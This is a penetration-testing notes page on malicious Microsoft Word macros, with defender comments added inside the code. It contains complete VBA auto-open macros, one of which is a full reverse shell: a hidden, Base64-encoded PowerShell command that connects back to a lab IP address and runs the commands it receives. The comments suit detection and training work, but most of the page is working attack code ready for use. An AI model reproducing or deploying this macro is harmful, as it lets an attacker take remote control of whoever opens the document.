Malicious Microsoft Word Macro

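This only works with the .docm or .doc formats, because they support embedded macros (.docx does NOT work!). For defenders, this means .doc and .docm are the Word attachment types to filter or treat as untrusted when they arrive from outside the organisation.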

How to save a macro

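  • VBA has a 255-character limit for literal strings, so a longer command must be split into chunks and concatenated (as the Reverse Shell listing below does)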
  • Make sure you store the Macro in the Project and not locally

Basic Macro

Sub AutoOpen()
    ' AutoOpen is one of Word's auto-macro names: it runs when the document
    ' is opened, provided macros are enabled. Macro analysis tools treat this
    ' name as an auto-execution trigger, so it is a useful triage indicator.
    Call MyMacro
End Sub
 
Sub Document_Open()
    ' Document_Open is the document's Open event handler. It is paired with
    ' AutoOpen so the same routine runs whichever trigger Word honours.
    Call MyMacro
End Sub
 
Sub MyMacro()
    ' Proof-of-execution routine: starts powershell.exe to ping a lab host.
    ' Detection view: this makes Word the parent process of powershell.exe,
    ' and the macro text contains the CreateObject("Wscript.Shell") / Run pair.
    Dim cmdLine As String
    Dim wsh As Object

    cmdLine = "powershell.exe ping 192.168.119.177"

    ' Run is called with the command only, so window style and wait
    ' behaviour are left at their defaults.
    Set wsh = CreateObject("Wscript.Shell")
    wsh.Run cmdLine
End Sub

Reverse Shell

Sub AutoOpen()
    ' Word auto-macro: runs on document open when macros are enabled, and
    ' hands off to the payload routine. Blocking macros in files that came
    ' from the Internet stops execution at this point.
    Call MyMacro
End Sub
 
Sub Document_Open()
    ' Open event handler, a second trigger for the same payload routine
    ' that AutoOpen also calls.
    Call MyMacro
End Sub
 
Sub MyMacro()
    ' Builds a PowerShell command line in Str and starts it through
    ' Wscript.Shell. The page's heading labels the payload a reverse shell.
    '
    ' Notes for analysts and detection engineers:
    '   - -nop / -w hidden / -e are the short forms of -NoProfile,
    '     -WindowStyle Hidden and -EncodedCommand. -e takes Base64 of
    '     UTF-16LE script text.
    '   - The Base64 decodes to a script that begins by creating a
    '     System.Net.Sockets.TCPClient to 192.168.119.177 on port 80 (a
    '     private lab address). Decode the full string offline to confirm
    '     the rest of the script.
    '   - High-signal telemetry: an Office process spawning powershell.exe,
    '     a hidden window combined with an encoded command, and PowerShell
    '     script block logging, which records the decoded script.
    '   - Mitigations: block macros in files from the Internet, and enable
    '     the attack surface reduction rule that stops Office applications
    '     from creating child processes.
    Dim Str As String
    
    ' The command is assembled in short chunks because of the VBA limit on
    ' literal string length noted at the top of the page. A long run of
    ' "Str = Str + ..." lines carrying Base64 is itself a static indicator.
    Str = "powershell.exe -nop -w hidden -e JABjAGwAaQBlAG4Ad"
    Str = Str + "AAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdAB"
    Str = Str + "lAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDA"
    Str = Str + "GwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADEAMQA5AC4"
    Str = Str + "AMQA3ADcAIgAsADgAMAApADsAJABzAHQAcgBlAGEAbQAgAD0AI"
    Str = Str + "AAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAA"
    Str = Str + "pADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgA"
    Str = Str + "DAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGU"
    Str = Str + "AKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZ"
    Str = Str + "AAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwA"
    Str = Str + "uAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkA"
    Str = Str + "GQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACA"
    Str = Str + "ALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZ"
    Str = Str + "QB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgB"
    Str = Str + "HAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsA"
    Str = Str + "CAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGk"
    Str = Str + "AZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAd"
    Str = Str + "AAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwB"
    Str = Str + "rADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQA"
    Str = Str + "FMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACA"
    Str = Str + "AIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAW"
    Str = Str + "wB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwB"
    Str = Str + "DAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkA"
    Str = Str + "GIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQ"
    Str = Str + "AZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZ"
    Str = Str + "ABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQB"
    Str = Str + "hAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0A"
    Str = Str + "C4AQwBsAG8AcwBlACgAKQA="
 
    ' Late-bound Wscript.Shell object; Run starts the assembled command.
    CreateObject("Wscript.Shell").Run Str
End Sub

Relevant Note(s): Client-Side Attacks